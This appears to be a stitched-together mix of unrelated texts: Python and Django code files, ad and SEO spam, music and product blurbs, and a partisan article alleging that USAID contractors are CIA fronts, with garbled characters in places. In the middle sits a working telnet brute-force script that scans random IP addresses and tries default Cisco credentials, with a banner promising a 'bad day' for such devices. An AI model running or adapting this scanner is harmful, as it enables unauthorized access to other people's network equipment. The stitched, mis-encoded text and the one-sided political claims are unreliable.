from snippets.serializers import SnippetSerializer
from django.http import Http404
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status


class SnippetDetail(APIView):
    """
    Retrieve, update or delete a snippet instance.

    Every response uses the same JSON envelope:
    ``{'message', 'data', 'error', 'errorDetails'}``.
    """

    def get_object(self, pk):
        """Return the Snippet with primary key `pk`, or raise Http404."""
        try:
            return Snippet.objects.get(pk=pk)
        except Snippet.DoesNotExist:
            raise Http404

    def get(self, request, pk, format=None):
        """Return the serialized snippet wrapped in the standard envelope."""
        snippet = self.get_object(pk)
        serializer = SnippetSerializer(snippet)
        return Response({
            'message': 'The snippet has been found successfully.',
            'data': serializer.data,
            'error': False,
            'errorDetails': None
        })

    def put(self, request, pk, format=None):
        """Replace the snippet with the request payload.

        Returns 400 with the serializer's errors when validation fails;
        the submitted payload is echoed back in ``data`` for debugging.
        """
        snippet = self.get_object(pk)
        serializer = SnippetSerializer(snippet, data=request.data)
        if serializer.is_valid():
            serializer.save()
            return Response({
                'message': 'The snippet has been updated successfully.',
                'data': serializer.data,
                'error': False,
                'errorDetails': None
            })
        return Response({
            'message': 'There are one or more errors in the data sent.',
            'data': request.data,
            'error': True,
            'errorDetails': serializer.errors
        }, status=status.HTTP_400_BAD_REQUEST)

    def delete(self, request, pk, format=None):
        """Delete the snippet and return its last serialized state.

        Two fixes over the previous revision:
        * the representation is captured *before* ``.delete()`` — DRF's
          ``serializer.data`` is evaluated lazily, so reading it after
          deletion serialized an instance whose pk was reset to None;
        * the envelope is returned with 200 OK instead of 204 No Content —
          RFC 9110 forbids a body on 204 responses, so the payload was
          silently dropped before it ever reached clients.
        """
        snippet = self.get_object(pk)
        # Capture the representation while the instance is still intact.
        data = SnippetSerializer(snippet).data
        snippet.delete()
        return Response({
            'message': 'The snippet has been deleted successfully.',
            'data': data,
            'error': False,
            'errorDetails': None
        }, status=status.HTTP_200_OK)
These three documents are disavowals of those who oppose the Islamic State of Iraq (ISI) and pledges of allegiance to ISI. In their pledge, the authors disavow any party or group that works against ISI and pledge their allegiance to it. They also assert that they surrender their weapons.
# Copyright (c) 2014-2019. Mount Sinai School of Medicine
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""setuptools packaging script for varcode (variant annotation library)."""

from __future__ import print_function

import os
import re

from setuptools import setup, find_packages

# The README is shipped to PyPI as the long description (markdown).
readme_filename = "README.md"
current_directory = os.path.dirname(__file__)
readme_path = os.path.join(current_directory, readme_filename)

# Best-effort read: a missing/unreadable README must not abort installation,
# so fall back to an empty long description and just report the problem.
try:
    with open(readme_path, 'r') as f:
        readme_markdown = f.read()
except Exception as e:
    readme_markdown = ""
    print(e)
    print("Failed to open %s" % readme_path)

# Determine version number
# Parse __version__ out of varcode/__init__.py with a regex instead of
# importing the package, which would require its dependencies to already
# be installed at build time.
with open('varcode/__init__.py', 'r') as f:
    version = re.search(
        r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]',
        f.read(),
        re.MULTILINE).group(1)

print("Version: %s" % version)

if __name__ == '__main__':
    setup(
        name='varcode',
        packages=find_packages(),
        # Ship the logging config used by the CLI entry points below.
        package_data={'varcode.cli': ['logging.conf']},
        version=version,
        description="Variant annotation in Python",
        long_description=readme_markdown,
        long_description_content_type='text/markdown',
        url="https://github.com/openvax/varcode",
        author="Alex Rubinsteyn",
        author_email="alex@openvax.org",
        license="http://www.apache.org/licenses/LICENSE-2.0.html",
        classifiers=[
            'Development Status :: 3 - Alpha',
            'Environment :: Console',
            'Operating System :: OS Independent',
            'Intended Audience :: Science/Research',
            'License :: OSI Approved :: Apache Software License',
            'Programming Language :: Python',
            'Topic :: Scientific/Engineering :: Bio-Informatics',
        ],
        install_requires=[
            'numpy>=1.7, <2.0',
            'pandas>=0.15',
            'pyensembl>=1.8.1',
            'biopython>=1.64',
            'pyvcf>=0.6.7',
            'memoized_property>=1.0.2',
            'serializable>=0.2.1',
            'sercol>=0.1.4',
        ],
        entry_points={
            'console_scripts': [
                'varcode-genes = varcode.cli.genes_script:main',
                'varcode = varcode.cli.effects_script:main',
            ]
        })
Z-Patch is a heavy-duty, high compression strength floor patch for repairing and resurfacing damaged plant floors. It renews and repairs spalled and damaged floors, fills and eliminates damaged expansion joints, and anchors machinery. Z-Patch absorbs vibration and shock without cracking and is excellent for expansion and contraction applications. It withstands heavy, abusive traffic and is extra-long wearing. We have aggregate epoxy flooring in a large portion of our facility. Some of it has started to fail in spots and we have used this product to repair the failed areas with good results. Very impressed with the product. The product is portioned in such a way that it eliminates mixture mistakes by the end user. The material is virtually bombproof. That is a good thing, since my crews may well find areas of application that demand exactly that kind of toughness.
import time
import sys
import gc
import os
import datetime
import functools


class Profiler:
    """Static helpers for lightweight wall-clock profiling via print()."""

    # Maps an active profile name to its start timestamp (perf_counter).
    profile_map = {}
    # Stop-watch bookkeeping: overall start and start of the current section.
    start_time = 0.0
    section_start_time = 0.0

    @staticmethod
    def start(profile_name=''):
        """Begin timing *profile_name*; warn if that name is already running."""
        if profile_name not in Profiler.profile_map:
            Profiler.profile_map[profile_name] = time.perf_counter()
        else:
            # Fixed message grammar ("is already exists" -> "already exists").
            print('%s already exists.' % profile_name)

    @staticmethod
    def end(profile_name=''):
        """Stop timing *profile_name* and print the elapsed milliseconds.

        Silently does nothing if the name was never started.
        """
        if profile_name in Profiler.profile_map:
            start_time = Profiler.profile_map.pop(profile_name)
            print('%s : %.2fms' % (
                profile_name, (time.perf_counter() - start_time) * 1000.0))

    @staticmethod
    def set_stop_watch():
        """Reset both the overall and the per-section stop-watch timers."""
        Profiler.start_time = time.perf_counter()
        Profiler.section_start_time = Profiler.start_time

    @staticmethod
    def get_stop_watch(profile_name=''):
        """Print time since the last section mark and since set_stop_watch()."""
        current_time = time.perf_counter()
        print('%s : %.2fms ( elapsed %.2fms )' % (
            profile_name,
            (current_time - Profiler.section_start_time) * 1000.0,
            (current_time - Profiler.start_time) * 1000.0))
        Profiler.section_start_time = current_time

    @staticmethod
    def check(func):
        """Decorator that prints how long each call to *func* takes."""
        @functools.wraps(func)  # preserve the wrapped function's metadata
        def decoration(*args, **kargs):
            start_time = time.perf_counter()
            result = func(*args, **kargs)
            print('%s : %.2fms' % (
                func.__name__, (time.perf_counter() - start_time) * 1000.0))
            return result
        return decoration


def GetClassName(cls):
    """Return the class name of the given instance."""
    return cls.__class__.__name__


def is_gz_compressed_file(filename):
    """Return True if *filename* begins with the gzip magic bytes."""
    # Removed an unreachable ``return False`` that followed the with-block;
    # the with-block always returns.
    with open(filename, 'rb') as f:
        return f.read(3) == b'\x1f\x8b\x08'


def check_directory_and_mkdir(dirname):
    """Create *dirname* (and any missing parents) if it does not exist."""
    if dirname and not os.path.exists(dirname):
        os.makedirs(dirname)


def get_modify_time_of_file(filepath):
    """Return the modification time of *filepath* as a string.

    Falls back to str(datetime.datetime.min) when the path is empty or
    missing, so callers always receive a comparable timestamp string.
    """
    if filepath != "" and os.path.exists(filepath):
        timeStamp = os.path.getmtime(filepath)
        return str(datetime.datetime.fromtimestamp(timeStamp))
    return str(datetime.datetime.min)


def delete_from_referrer(obj):
    """
    desc : Find and remove all references to obj.

    Only dict referrers are handled; matching values are replaced with
    None (key assignment during iteration is safe since no keys are
    added or removed).
    """
    referrers = gc.get_referrers(obj)
    for referrer in referrers:
        if type(referrer) == dict:
            for key, value in referrer.items():
                if value is obj:
                    referrer[key] = None


def object_copy(src, dst):
    """Make *dst* share *src*'s attribute dict (aliases, not a deep copy)."""
    dst.__dict__ = src.__dict__
Shop the Eddie Bauer sale today and you can receive a 40% discount on items from the Horizon collection. Shop for men and discover discounts on pants, capris, and shorts. All of these items are perfect for the outdoors. No Eddie Bauer promo code needed. Enjoy a 40% discount on the Horizon Collection for women when you shop the Eddie Bauer sale today. Discover discounts on pants, capris, and shorts. No Eddie Bauer promo code needed. Get a 65% discount on Women’s Stayshape Denim when you use this Eddie Bauer promo code and shop online. Don't miss out on this limited time offer to save on denim. Get the latest outdoor clothing online at Eddie Bauer. Use this Eddie Bauer coupon and save 65% on Women's StayShape Boot Cut Jeans - Curvy. You will also receive free shipping on your order. Discover more discounts on outdoor clothing and accessories at Eddie Bauer. These Women's StayShape Straight Leg Jeans - Curvy are currently 65% off when you apply this Eddie Bauer promo code online. Enjoy this discount and many more when you shop for outdoor clothing online at Eddie Bauer. This Eddie Bauer promo code will get you a 65% discount when you purchase the StayShape Straight Leg Jeans - Slightly Curvy for women. Get the latest outdoor clothing when you shop online at Eddie Bauer. Save a huge 65% on these Women's StayShape High-Rise Slim Straight Jeans when you use this Eddie Bauer coupon and purchase online. Get the latest outdoor clothing trends from Eddie Bauer today.
import threading import telnetlib import sys import socket import random import thread import time print "|","-"*61, "|" print "|\tAll of cisco routers , switches with default\t\t|\n|\tusername and passwords are will have a bad day today\t|" print "|","-"*61, "|" def bruteForce(ip): dict={"Administrator":"admin","|Administrator":"changeme","cisco":"cisco","admin":"admin","|admin":"diamond","||admin":"cisco","root":"Cisco","|root":"password","||root":"blender","|||root":"attack","bbsd-client":"changeme2","cmaker":"cmaker","cusadmin":"password","hsa":"hsadb","netrangr":"attack","wlse":"wlsedb","wlseuser":"wlseuser"} for key,value in dict.iteritems(): key = key.replace("|" , "") try: #print " Trying User:",key," Password:",value ," on " , ip tn = telnetlib.Telnet(ip,23,2) tn.read_until((":" or ">" or "$" or "@")) tn.write(key + "\n") tn.read_until((":" or ">" or "$" or "@")) tn.write(value + "\n") tn.write("dir\n") tn.write("exit\n") tn.read_all()#we can print this to get the banner print "\t\nLogin successful:", key , " -> " , value tn.close() sys.exit(1) except Exception ,e: #print ip , " --> " , e pass finally: try: tn.close() except Exception , e: pass #randy() def randy(): a=random.randint(1,254) b=random.randint(1,254) c=random.randint(1,254) d=random.randint(1,4) ip=str(a) + "." +str(b) + "." +str(c) + "." 
+str(d) try: telnetlib.Telnet(ip , 23 , 2) print "Telneting on host : " , ip bruteForce(ip) except Exception ,e: #print ip," => does not have telnet enabled" , e randy() for threads in range(0,20): thread.start_new_thread(randy,()) time.sleep(0.5) """ if len(sys.argv) !=4: print "Usage: ./telnetbrute.py <server> <userlist> <wordlist>" sys.exit(1) #---------------------------------------------------------------- try: userlist = open(sys.argv[2], "r").readlines() #userlist.close() for user in userlist: user = user.strip("\n") users.append(user) except(IOError): print "Error: Check your userlist path\n" sys.exit(1) #------------------------------------------------------------------ try: wordlist = open(sys.argv[3], "r").readlines() #wordlist.close() except(IOError): print "Error: Check your wordlist path\n" sys.exit(1) for word in wordlist: words.append(word) #lock = threading.Lock() #lock.acquire() #lock.release() for key , value in dict.iteritems(): print key.replace("|","")+"="+value """
SEO Manor Lakes - David Lurie "Mr SEO", SEO Consultant Manor Lakes. Manor Lakes SEO services and online marketing programs for fast business growth with Manor Lakes's local SEO expert and online marketing consultant David Lurie. Business clients regard his SEO Manor Lakes business services as the best due to the consistent growth in leads, sales and profits he has been able to help them achieve in their businesses with his web marketing and local SEO services. As one of the best online marketing and SEO consultants servicing Manor Lakes, you'll find many SEO client testimonials on this website which show how effective his online marketing and SEO strategies are and how he can help your business. If you want a proven Manor Lakes SEO consultant with a strong track record of growth spanning over a decade, then you should research David Lurie and his online marketing and SEO consulting services by spending some time on this site.
import bpy
import sys
from bpy.props import *
from .. base_types import UMOGSocket
from .. utils.events import propUpdate


class BooleanSocket(bpy.types.NodeSocket, UMOGSocket):
    '''Custom Boolean socket type'''
    # Unique identifier Blender uses to register this socket type.
    bl_idname = 'BooleanSocketType'
    # Label for nice name display in the Blender UI.
    bl_label = 'Boolean Socket'

    dataType = "Boolean"
    # Socket types accepted as inputs; numeric inputs are coerced in
    # setProperty() below.
    allowedInputTypes = ["Float", "Integer", "Boolean"]
    useIsUsedProperty = False
    defaultDrawType = "PREFER_PROPERTY"

    # RGBA draw color for this socket in the node editor.
    drawColor = (0.247058824, 0.317647059, 0.705882353, 1)

    value = BoolProperty(default=True, update=propUpdate)

    def drawProperty(self, context, layout, layoutParent, text, node):
        """Draw the boolean value as a checkbox in the node layout."""
        # Removed a redundant ``pass`` that followed this statement.
        layout.prop(self, "value", text=text)

    def refresh(self):
        """Keep the socket's display name in sync with its current value."""
        self.name = str(self.value)

    def getValue(self):
        """Return the current boolean value."""
        return self.value

    def setProperty(self, data):
        """Set the socket value, coercing numeric input to a boolean."""
        if isinstance(data, bool):
            self.value = data
        else:
            # Float/Integer inputs are treated as True when strictly positive.
            self.value = data > 0

    def getProperty(self):
        """Return the raw property backing this socket."""
        return self.value
I will likely be using Twilio for SMS integration in future projects. What really sold me was this infographic that they used to demonstrate how easy it is to programmatically send an SMS. Interestingly though, they didn’t appear when I did a Google search for how to programmatically send a text message.
import os # import djcelery from django.contrib.messages import constants as messages # djcelery.setup_loader() SITE_ROOT = os.path.join(os.path.realpath(os.path.dirname(__file__)), '../../') # Changes the naming on the front-end of the website. SITE_NAME = 'Searcular v2' # Set to False to disable people from creating new accounts. ALLOW_NEW_REGISTRATIONS = True # Set to False to force users to login before seeing any pins. PUBLIC = True TIME_ZONE = 'Europe/London' LANGUAGE_CODE = 'en-us' USE_I18N = True USE_L10N = True USE_TZ = True MEDIA_URL = '/media/' STATIC_URL = '/static/' MEDIA_ROOT = os.path.join(SITE_ROOT, 'media') STATIC_ROOT = os.path.join(SITE_ROOT, 'static') TEMPLATE_DIRS = [os.path.join(SITE_ROOT, 'pinry/templates')] STATICFILES_DIRS = [os.path.join(SITE_ROOT, 'pinry/static')] STATICFILES_FINDERS = ( 'django.contrib.staticfiles.finders.FileSystemFinder', 'django.contrib.staticfiles.finders.AppDirectoriesFinder', 'compressor.finders.CompressorFinder' ) TEMPLATE_LOADERS = ( 'django.template.loaders.filesystem.Loader', 'django.template.loaders.app_directories.Loader', ) MIDDLEWARE_CLASSES = ( 'django.middleware.common.CommonMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'pinry.users.middleware.Public', 'pinry.core.middleware.Public', ) TEMPLATE_CONTEXT_PROCESSORS = ( 'django.contrib.auth.context_processors.auth', 'django.core.context_processors.debug', 'django.core.context_processors.i18n', 'django.core.context_processors.media', 'django.core.context_processors.static', 'django.core.context_processors.request', 'django.contrib.messages.context_processors.messages', 'pinry.core.context_processors.template_settings', ) AUTHENTICATION_BACKENDS = ( 'pinry.users.auth.backends.CombinedAuthBackend', 'django.contrib.auth.backends.ModelBackend', ) ROOT_URLCONF = 'pinry.urls' LOGIN_URL = '/login/' LOGIN_REDIRECT_URL = '/' 
# Hosts allowed to see debug-only output (e.g. the debug toolbar).
INTERNAL_IPS = ['127.0.0.1']

# Map Django message levels onto Bootstrap-style alert CSS classes.
MESSAGE_TAGS = {
    messages.WARNING: 'alert',
    messages.ERROR: 'alert alert-error',
    messages.SUCCESS: 'alert alert-success',
    messages.INFO: 'alert alert-info',
}

# Maximum number of results per page returned by the API.
API_LIMIT_PER_PAGE = 50

INSTALLED_APPS = (
    'django.contrib.auth',
    'django.contrib.admin',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    # Third-party apps: migrations, tagging, asset compression, images, OAuth2.
    'south',
    'taggit',
    'compressor',
    'django_images',
    'provider',
    'provider.oauth2',
    # Project apps.
    'pinry.core',
    'pinry.users',
)

# Dotted path to the callable that computes upload paths for images.
IMAGE_PATH = 'pinry.core.utils.upload_path'

# Image size/crop presets consumed by django_images; a 0 dimension
# presumably means "scale preserving aspect ratio" — confirm against
# the django_images documentation.
IMAGE_SIZES = {
    'thumbnail': {'size': [240, 0]},
    'standard': {'size': [600, 0]},
    'square': {'crop': True, 'size': [125, 125]},
}
Includes unlimited streaming of Kykeon via the free Bandcamp app, plus high-quality download in MP3, FLAC and more. Figure continues its new limited edition hybrid disc ' x.5 ' series with a special 2 track offering from Johannes Heil. 'Kykeon I' represents an unabashed, smiles-abound floor-filler with one of Heil's most joyful and accessible productions to date. A perfect heady cocktail of slamming 90s drums and uplifting house- stab melodies, the german producer has really struck a chord here with this future club-classic. The spaced out stepping beats of 'Kykeon II' then, sit in welcome contrast to the all out madness of its bigger brother. Subtle, intelligent Techno formations rise and swell, based around a similar melodic framework to that found in part I. Another masterclass from one of the most talented producers in the business. written & produced by Johannes Heil.
''' The MIT License (MIT) Copyright (c) 2016 kagklis Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 
'''

from math import sqrt
import numpy as np
from copy import deepcopy
from pandas import Series, DatetimeIndex
import statsmodels.api as sm
from statsmodels.graphics.api import qqplot
from statsmodels.tsa.arima_model import _arma_predict_out_of_sample


def limit_range(values, nm, nM):
    """Linearly rescale *values* in place from [min, max] to [nm, nM].

    Mutates the input list and also returns it.
    """
    M = max(values)
    m = min(values)
    oldRange = M-m
    newRange = nM-nm
    for i in range(len(values)):
        values[i] = (((values[i] - m)*newRange)/oldRange) + nm
    return(values)


def mean(values):
    """Return the arithmetic mean of *values*."""
    return (sum(values)*1.0)/len(values)


def stanDev(values):
    """Return (mean, population standard deviation) of *values*."""
    m = mean(values)
    total_sum = 0
    for i in range(len(values)):
        total_sum += (values[i]-m)**2
    # Divides by N (population std), not N-1.
    under_root = (total_sum*1.0)/len(values)
    return (m,sqrt(under_root))


def linreg(X, Y):
    """
    return a,b in solution to y = ax + b such that root mean square distance
    between trend line and original points is minimized
    """
    N = len(X)
    Sx = Sy = Sxx = Syy = Sxy = 0.0
    for x, y in zip(X, Y):
        Sx = Sx + x
        Sy = Sy + y
        Sxx = Sxx + x*x
        Syy = Syy + y*y
        Sxy = Sxy + x*y
    det = Sxx * N - Sx * Sx
    return (Sxy * N - Sy * Sx)/det, (Sxx * Sy - Sx * Sxy)/det


def predict(data, Ds, AL, steps):
    """Build three *steps*-ahead forecasts of the single series in *data*.

    Parameters
    ----------
    data : assumed to be a one-column pandas DataFrame with a daily
        DatetimeIndex (freq="D" is asserted when building the result
        indexes) — TODO confirm against callers.
    Ds, AL : summarization-feature sequences used by the third forecast
        (semantics defined by the caller; not inspectable from here).
    steps : number of future points to forecast.

    Returns
    -------
    (arma_t, arma_t_r, summarized_t) : three pandas Series, each of
        length steps+1 (the last observed value is prepended so plots
        join up with the history).
    '''NOTE(review): uses the deprecated private helper
    _arma_predict_out_of_sample from statsmodels.tsa.arima_model.'''
    """
    key = data.keys()
    key = key[0]
    V = len(data[key])
    # Create N-step prediction using ARMA method on the initial timeseries.
    # Fits ARMA(3, 0) on all but the last `steps` observations, then
    # forecasts the held-out horizon in one shot.
    res = sm.tsa.ARMA(data[key][0:(V-1-steps)], (3, 0)).fit()
    params = res.params
    residuals = res.resid
    p = res.k_ar
    q = res.k_ma
    k_exog = res.k_exog
    k_trend = res.k_trend
    temp = _arma_predict_out_of_sample(params, steps, residuals, p, q,
                                       k_trend, k_exog, endog=data[key],
                                       exog=None, start=V-steps)
    # Prepend the last observed value so the forecast joins the history.
    pArma = [data[key][V-steps-1]]
    pArma.extend(temp)
    arma_t = Series(pArma, index=DatetimeIndex([data[key].index[V-steps-1+i] for i in range(steps+1)],freq="D"))
    print("ARMA: \n",arma_t)
    pred = deepcopy(data)
    offset = 1
    # Create N-step prediction using recursive ARMA method on the initial
    # timeseries: re-fit after every 1-step forecast, feeding each forecast
    # back into `pred` so the next fit sees it.
    for ss in range(steps, 0, -offset):
        res = sm.tsa.ARMA(pred[key][0:(V-1-ss)], (3, 0)).fit()
        params = res.params
        residuals = res.resid
        p = res.k_ar
        q = res.k_ma
        k_exog = res.k_exog
        k_trend = res.k_trend
        pred[key][V-ss] = _arma_predict_out_of_sample(params, offset,
                                                     residuals, p, q,
                                                     k_trend, k_exog,
                                                     endog=data[key],
                                                     exog=None,
                                                     start=V-ss)[0]
    rArma = [data[key][V-steps-1]]
    rArma.extend(pred[key][V-steps:(V+1)])
    arma_t_r = Series(rArma, index=DatetimeIndex([data[key].index[V-steps-1+i] for i in range(steps+1)],freq="D"))
    print("rARMA: \n",arma_t_r)
    # Create N-step prediction using Summarization Features:
    # symmetric-pad Ds to extend it `steps` points past the end, combine
    # with a linear trend fitted to AL, and scale down by 10.
    ext_Ds = np.pad(Ds, steps, mode='symmetric')
    ext_Ds = [ext_Ds[len(ext_Ds)-steps+i] for i in range(steps)]
    #print("Ds:",ext_Ds)
    m, s = stanDev(data[key])
    a,b = linreg(range(len(AL)), AL)
    r = [a*index + b for index in range(len(AL)+steps)]
    temp2 = [(ext_Ds[i]+r[len(AL)-1+i])/10 for i in range(steps)]
    fcst = [data[key][V-steps-1]]
    fcst.extend(temp2)
    summarized_t = Series(fcst, index=DatetimeIndex([data[key].index[V-steps-1+i] for i in range(steps+1)],freq="D"))
    print("Summarized: \n",summarized_t)
    return(arma_t, arma_t_r, summarized_t)
An article published in the December 12th edition of the New York Times (http://www.nytimes.com/2009/12/12/world/americas/12cuba.html?_r=1) revealed the detention of a US government contract employee in Havana this past December 5th. The employee, whose name has not yet been disclosed, works for Development Alternatives, Inc. (DAI), one of the largest US government contractors providing services to the State Department, the Pentagon and the US Agency for International Development (USAID). The employee was detained while distributing cellular telephones, computers and other communications equipment to Cuban dissident and counterrevolutionary groups that work to promote US agenda on the Caribbean island. Last year, the US Congress approved $40 million to "promote transition to democracy" in Cuba. DAI was awarded the main contract, "The Cuba Democracy and Contingency Planning Program", with oversight by State and USAID. The use of a chain of entities and agencies is a mechanism employed by the Central Intelligence Agency (CIA) to channel and filter funding and strategic political support to groups and individuals that support US agenda abroad. The pretext of "promoting democracy" is a modern form of CIA subversion tactics, seeking to infiltrate and penetrate civil society groups and provide funding to encourage "regime change" in strategically important nations, such as Venezuela, with governments unwilling to succumb to US dominance. DAI was contracted in June 2002 by USAID to manage a multimillion dollar contract in Venezuela, just two months after the failed coup d'état against President Hugo Chávez. Prior to this date, USAID had no operations in Venezuela, not even an office in the Embassy.
DAI was charged with opening the Office for Transition Initiatives (OTI), a specialized branch of USAID that manages large quantities of liquid funds destined for organizations and political parties favorable to Washington in countries of strategic interest that are undergoing political crises. The first contract between USAID and DAI for its Venezuela operations authorized $10 million for a two year period. DAI opened its doors in the Wall Street of Caracas, El Rosal, in August 2002, and began to immediately fund the same groups that just months earlier had executed - unsuccessfully � the coup against President Ch�vez. The USAID/DAI funds in Venezuela were distributed to organizations such as Fedec�maras and the Confederaci�n de Trabajadores Venezolanos (CTV), two of the principal entities that had led the coup in April 2002 and that later headed another attempt to oust Ch�vez by imposing an economic sabotage and oil industry strike that crippled the nation�s economy. One contract between DAI and these organizations, dated December 2002, awarded more than $10,000 to help design radio and television propaganda against President Ch�vez. During that time period, Venezuela experienced one of the most viscious media wars in history. Private television and radio stations, together with print media, devoted non-stop programming to opposition propaganda for 64 days, 24 hours a day. In February 2003, DAI began to fund a recently created group named S�mate, led by Maria Corina Machado, one of the signators of the �Carmona Decree�, the famous dictatorial decree that dissolved all of Venezuela�s democratic institutions during the brief April 2002 coup d�etat. S�mate soon became the principal opposition organization directing campaigns against President Ch�vez, including the August 2004 recall referendum. 
The three main agencies from Washington operating in Venezuela at that time, USAID, DAI and the National Endowment for Democracy (�NED�), invested more than $9 million in the opposition campaign to oust Ch�vez via recall referendum, without success. Ch�vez won with a 60-40 landslide victory. To date, the OTI still remains in Venezuela, with DAI as its principal contractor. But now, four other entities share USAID�s multimillion dollar pie in Caracas: International Republican Institute (IRI), National Democratic Institute for International Affairs (NDI), Freedom House, and the PanAmerican Development Foundation (PADF). Of the 64 groups funded from 2002-2004 with approximately $5 million annually, today the OTI funds more than 533 organizations, political parties, programs and projects, mainly in opposition sectors, with an annual budget surpassing $7 million. Its presence has not only remained, but has grown. Obviously this is due to one very simple reason: the original objetive has still not been obtained; the overthrow or removal of President Hugo Ch�vez. This organization dedicated to destabilizing governments unfavorable to US interests has now made its appearance in Cuba, with millions of dollars destined to destroy the Cuban revolution. Ex CIA officer Phillip Agee affirmed that DAI, USAID and NED �are instruments of the US Embassy and behind these three organizations is the CIA.� The contract between USAID and DAI in Venezuela confirms this fact, �The field representative will maintain close collaboration with other embassy offices in identifying opportunities, selecting partners and ensuring the program remains consistent with US foreign policy.� There is no doubt that �selecting partners� is another term for �recluting agents� and �consistent with US foreign policy� means �promoting Washington�s interests�, despite issues of sovereignty. 
Clearly, all DAI activities are directly coordinated by the US Embassy, a fact which negates the �private� nature of the organization. The detention of a DAI employee is a very important step to impede destabilization and subversion inside Cuba. This episode also confirms that there has been no change of policy with the Obama Administration towards Cuba � the same tactics of espionage, infiltration and subversion are still being actively employed against one of Washington�s oldest adversaries. Now that Cuba has exposed the intelligence operations that DAI was engaging in (recluting agents, infiltrating political groups and distributing resources destined to promote destabilization and regime change are all intelligence activities and illegal), the Venezuelan government should respond firmly by expelling this grave threat from the country. DAI has now been operating in Venezuela for over seven and a half years, feeding the conflict with more than $50 million dollars and promoting destabilization, counterrevolution, media warfare and sabotage. In an ironic twist, currently in the United States five Cuban citizens are imprisoned on charges of alleged espionage, yet their actions in US territory were not directed towards harming US interests. But the DAI employee detained in Cuba � working for a CIA front company � was engaged in activities intended to directly harm and destabilize the Cuban government. The distribution of materials to be used for political purposes by a foreign government with the intent of promoting regime change in a nation not favorable to US interests is clearly a violation of sovereignty and an act of espionage. Development Alternatives, Inc. is one of the largest US government contractors in the world. Currently, DAI has a $50 million contract in Afghanistan. 
In Latin America, DAI is presently operating in Bolivia, Brasil, Colombia, Cuba, Ecuador, El Salvador, Guatemala, Hait�, Honduras, M�xico, Nicaragua, Per�, Rep�blica Dominicana and Venezuela. At least eight U.S. citizens were killed on a CIA operations base in Afghanistan this past Wednesday, December 30. A suicide bomber infiltrated Forward Operating Base Chapman located in the eastern province of Khost, which was a CIA center of operations and surveillance. Official sources in Washington have confirmed that the eight dead were all civilian employees and CIA contractors. Fifteen days ago, five U.S. citizens working for a U.S. government contractor, Development Alternatives, Inc. (DAI), were also killed in an explosion at the U.S. Agency for International Development (USAID) office in Gardez. That same day, another bomb exploded outside the DAI offices in Kabul, although no serious injuries resulted. The December 15 incident received little attention, although it occurred just days after the detention of a DAI employee in Cuba, accused of subversion and distribution of illegal materials to counterrevolutionary groups. President and CEO of DAI, Jim Boomgard, issued a declaration on December 14 regarding the detention of a subcontractor from his company in Cuba, confirming that, �the detained individual was an employee of a program subcontractor, which was implementing a competitively issued subcontract to assist Cuban civil society organizations.� The statement also emphasized the �new program� DAI is managing for the U.S. government in Cuba, the �Cuba Democracy and Contingency Planning Program�. DAI was awarded a $40 million USD contract in 2008 to help the U.S. government �support the peaceful activities of a broad range of nonviolent organizations through competitively awarded grants and subcontracts� in Cuba. DAI also runs a program in Khost where the December 30 suicide bombing occurred, although it has yet to be confirmed if the eight U.S. 
citizens killed were working for the major U.S. government contractor. From the operations base in Khost, the CIA remotely controls its selective assassination program against alleged Al Qaeda members in Pakistan and Afghanistan using drone (Unmanned Aerial Vehicles) Predator planes. A high-level USAID official confirmed two weeks ago that the CIA uses USAID�s name to issue contracts and funding to third parties in order to provide cover for clandestine operations. The official, a veteran of the U.S. government agency, stated that the CIA issues such contracts without USAID�s full knowledge. Since June 2002, USAID has maintained an Office for Transition Initiatives (OTI) in Venezuela, through which it has channeled more than $50 million USD to groups and individuals opposed to President Hugo Ch�vez. The same contractor active in Afghanistan and connected with the CIA, Development Alternatives Inc. (DAI), was awarded a multi-million dollar budget from USAID in Venezuela to �assist civil society and the transition to democracy�. More than two thousand documents partially declassified from USAID regarding the agency�s activities in Venezuela reveal the relationship between DAI and sectors of the Venezuelan opposition that have actively been involved in coup d�etats, violent demonstrations and other destabilization attempts against President Ch�vez. In Bolivia, USAID was expelled this year from two municipalities, Chapare and El Alto, after being accused of interventionism. In September 2009, President Evo Morales announced the termination of an official agreement with USAID allowing its operations in Bolivia, based on substantial evidence documenting the agency�s funding of violent separtist groups seeking to destabilize the country. In 2005, USAID was also expelled from Eritrea and accused of being a �neo-colonialist� agency. Ethiopia, Russia and Belarus have ordered the expulsion of USAID and its contractors during the last five years. Development Alternatives, Inc. 
